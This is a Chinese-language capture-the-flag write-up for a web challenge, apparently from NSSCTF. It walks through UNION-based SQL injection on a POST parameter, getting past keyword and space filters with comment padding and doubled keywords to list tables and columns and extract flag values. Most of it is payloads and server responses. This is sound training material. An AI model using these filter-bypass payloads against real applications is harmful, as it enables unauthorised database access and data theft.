题目链接

页面内容

1
2
3
4
年轻的Web手啊!
看题目名就知道你该干嘛了吧~
用相对安全的方式传参吧
奥对了参数是nss

参数为nss, GET发送无效; POST nss=1发送成功 返回内容:

1
2
Flag: NSSCTF{This_1s_F4ke_flag}
This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng}

注入

  • 尝试联合注入

    1
    2
    > nss=-1' union select 1,2%23
    < You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'select1,2#' LIMIT 0,1' at line 1

    从报错可以发现空格和union被消除

    尝试绕过 成功

    1
    2
    3
    4
    5
    6
    7
    8
    > nss=-1'/**/ununionion/**/select/**/1,2,3%23
    < Flag: NSSCTF{This_1s_F4ke_flag}
    This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng}

    # 查看第二行内容
    > nss=-1'/**/ununionion/**/select/**/1,2,3/**/limit/**/1,1%23
    < Flag: 2
    This is true flag: 3
  • 接着常规流程注入

    注意or也会被屏蔽 所以information要更改为infoorrmation

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23
    < Flag: 2
    This is true flag: NSS_tb,users

    > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'/**/limit/**/1,1%23

    < Flag: 2
    This is true flag: id,Secr3t,flll444g


    > nss=-1'/**/ununionion/**/select/**/id,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_db.NSS_tb/**/limit/**/1,1%23

    < Flag: NSSCTF{b3c1613c-6acb-46f4-9510-f3184bd69eb5}
    This is true flag: NSSCTF{I_d0nt_want_t0_w4ke_up}
⬆︎TOP